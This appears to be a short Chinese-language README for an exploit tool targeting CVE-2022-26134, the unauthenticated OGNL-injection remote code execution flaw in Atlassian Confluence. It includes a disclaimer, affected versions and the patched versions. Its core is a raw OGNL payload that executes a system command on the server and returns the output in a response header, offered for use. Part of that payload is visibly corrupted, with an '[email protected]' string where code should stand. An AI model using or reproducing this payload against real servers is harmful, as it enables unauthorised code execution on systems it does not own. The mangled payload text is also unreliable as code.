BotCon
Attlasian Confluence 未授权远程代码执行漏洞(OGNL注入,CVE-2022-26134)
- 2022年6月2日,Atlassian 发布了一则关于其 Confluence Server 和 Data Center 产品的安全公告,强调了存在一个严重级别的未授权远程代码执行漏洞。该 OGNL 注入漏洞允许未授权用户在 Confluence Server 或 Data Center 实例上执行任意代码。
请注意!
谨慎使用。您对自己的行为负责。
开发者不承担任何责任,也不对任何误用或损害负责。

原始Payload
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
漏洞详情
-
受影响产品:
- Confluence
- Confluence Server
- Confluence Data Center
-
受影响版本:
- 所有受支持的 Confluence Server 和 Data Center 版本均受影响。
- 1.3.0 之后的 Confluence Server 和 Data Center 版本均受影响。
缓解措施
- 将您的 Attlasian Confluence 版本更新至以下修复版本:
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1